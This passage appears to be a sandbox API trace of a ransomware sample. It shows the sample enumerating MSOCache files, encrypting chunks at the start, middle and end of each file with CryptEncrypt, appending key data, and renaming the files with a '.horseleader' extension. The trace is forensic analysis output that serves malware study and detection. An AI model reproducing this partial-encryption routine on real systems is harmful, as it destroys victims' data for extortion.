returned 0x780000 [0223.120] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0223.120] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe7c66670, ftCreationTime.dwHighDateTime=0x1cb0ee5, ftLastAccessTime.dwLowDateTime=0xe7c66670, ftLastAccessTime.dwHighDateTime=0x1cb0ee5, ftLastWriteTime.dwLowDateTime=0x4a6ac100, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x165510, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="PidGenX.dll", cAlternateFileName="")) returned 1 [0223.120] lstrcmpiW (lpString1="PidGenX.dll", lpString2="Windows") returned -1 [0223.120] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 78 [0223.120] StrStrIW (lpFirst="PidGenX.dll", lpSrch=".horseleader") returned 0x0 [0223.120] lstrcmpW (lpString1="PidGenX.dll", lpString2="#Decrypt#.txt") returned 1 [0223.120] lstrcmpW (lpString1="PidGenX.dll", lpString2="_uninstalling_.png") returned 1 [0223.121] lstrlenW (lpString=".testttjffg") returned 11 [0223.121] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll", lpSrch=".testttjffg") returned 0x0 [0223.121] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0223.121] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0223.121] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0223.121] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 78 [0223.121] StrStrW (lpFirst="PidGenX.dll", lpSrch=".txt") returned 0x0 [0223.121] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1463568) returned 1 [0223.121] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.121] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.124] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0223.125] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.125] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xb0288, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.125] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.151] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0223.151] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.151] 
SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x160510, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.151] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.153] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0223.153] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.154] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.154] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0223.154] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0223.154] CloseHandle (hObject=0x21c) returned 1 [0223.154] GetProcessHeap () returned 0x780000 [0223.154] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0223.154] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll.horseleader") returned 90 [0223.155] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all 
users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll.horseleader")) returned 1 [0223.155] GetProcessHeap () returned 0x780000 [0223.155] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0223.156] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x95261510, ftCreationTime.dwHighDateTime=0x1cb048a, ftLastAccessTime.dwLowDateTime=0x95261510, ftLastAccessTime.dwHighDateTime=0x1cb048a, ftLastWriteTime.dwLowDateTime=0x4a6ac100, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0xaec3a, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="pkeyconfig-office.xrm-ms", cAlternateFileName="PKEYCO~1.XRM")) returned 1 [0223.156] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="Windows") returned -1 [0223.156] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0223.156] StrStrIW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".horseleader") returned 0x0 [0223.156] lstrcmpW (lpString1="pkeyconfig-office.xrm-ms", lpString2="#Decrypt#.txt") returned 1 [0223.156] lstrcmpW (lpString1="pkeyconfig-office.xrm-ms", lpString2="_uninstalling_.png") returned 1 [0223.156] lstrlenW (lpString=".testttjffg") returned 11 [0223.156] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms", lpSrch=".testttjffg") returned 0x0 [0223.156] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0223.156] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, 
dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0223.156] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0223.157] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0223.157] StrStrW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".txt") returned 0x0 [0223.157] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=715834) returned 1 [0223.157] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.157] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.189] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0223.189] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.381] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x54e1d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.632] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, 
lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.763] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0223.763] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.763] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xa9c3a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.763] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.780] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0223.781] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.783] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.783] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0223.785] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0223.785] CloseHandle (hObject=0x21c) returned 1 [0223.785] GetProcessHeap () returned 0x780000 [0223.785] 
RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0223.785] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.horseleader") returned 103 [0223.785] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.horseleader")) returned 1 [0223.786] GetProcessHeap () returned 0x780000 [0223.786] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0223.786] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb7e7af0, ftCreationTime.dwHighDateTime=0x1cb04a9, ftLastAccessTime.dwLowDateTime=0xeb7e7af0, ftLastAccessTime.dwHighDateTime=0x1cb04a9, ftLastWriteTime.dwLowDateTime=0x49c691c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x150578, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="setup.exe", cAlternateFileName="")) returned 1 [0223.786] lstrcmpiW (lpString1="setup.exe", lpString2="Windows") returned -1 [0223.786] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 76 [0223.786] StrStrIW (lpFirst="setup.exe", lpSrch=".horseleader") returned 0x0 [0223.786] lstrcmpW (lpString1="setup.exe", lpString2="#Decrypt#.txt") returned 1 [0223.787] lstrcmpW (lpString1="setup.exe", lpString2="_uninstalling_.png") returned 
1 [0223.787] lstrlenW (lpString=".testttjffg") returned 11 [0223.787] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe", lpSrch=".testttjffg") returned 0x0 [0223.787] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0223.787] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0223.787] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0223.798] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 76 [0223.798] StrStrW (lpFirst="setup.exe", lpSrch=".txt") returned 0x0 [0223.798] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1377656) returned 1 [0223.798] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.798] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.801] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0223.801] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 
[0223.802] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xa5abc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.802] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.804] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0223.804] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.805] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x14b578, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.805] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.807] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0223.807] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.808] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.808] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0223.808] WriteFile (in: 
hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0223.808] CloseHandle (hObject=0x21c) returned 1 [0223.809] GetProcessHeap () returned 0x780000 [0223.809] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0223.809] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe.horseleader") returned 88 [0223.809] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe.horseleader")) returned 1 [0223.810] GetProcessHeap () returned 0x780000 [0223.810] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0223.810] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80aa51d0, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80aa51d0, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x4a6d3200, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x5061, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0223.810] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0223.810] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 
[0223.810] StrStrIW (lpFirst="Setup.xml", lpSrch=".horseleader") returned 0x0 [0223.810] lstrcmpW (lpString1="Setup.xml", lpString2="#Decrypt#.txt") returned 1 [0223.810] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0223.810] lstrlenW (lpString=".testttjffg") returned 11 [0223.810] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".testttjffg") returned 0x0 [0223.810] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0223.810] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0223.810] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0223.811] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0223.811] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0223.811] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=20577) returned 1 [0223.811] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.814] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0223.814] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | 
out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.814] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x61, lpOverlapped=0x0) returned 1 [0223.815] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffff9f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0223.815] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x61, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x61, lpOverlapped=0x0) returned 1 [0223.815] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.815] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0223.815] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0223.816] CloseHandle (hObject=0x21c) returned 1 [0223.816] GetProcessHeap () returned 0x780000 [0223.816] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0223.816] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.horseleader") returned 88 [0223.816] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All 
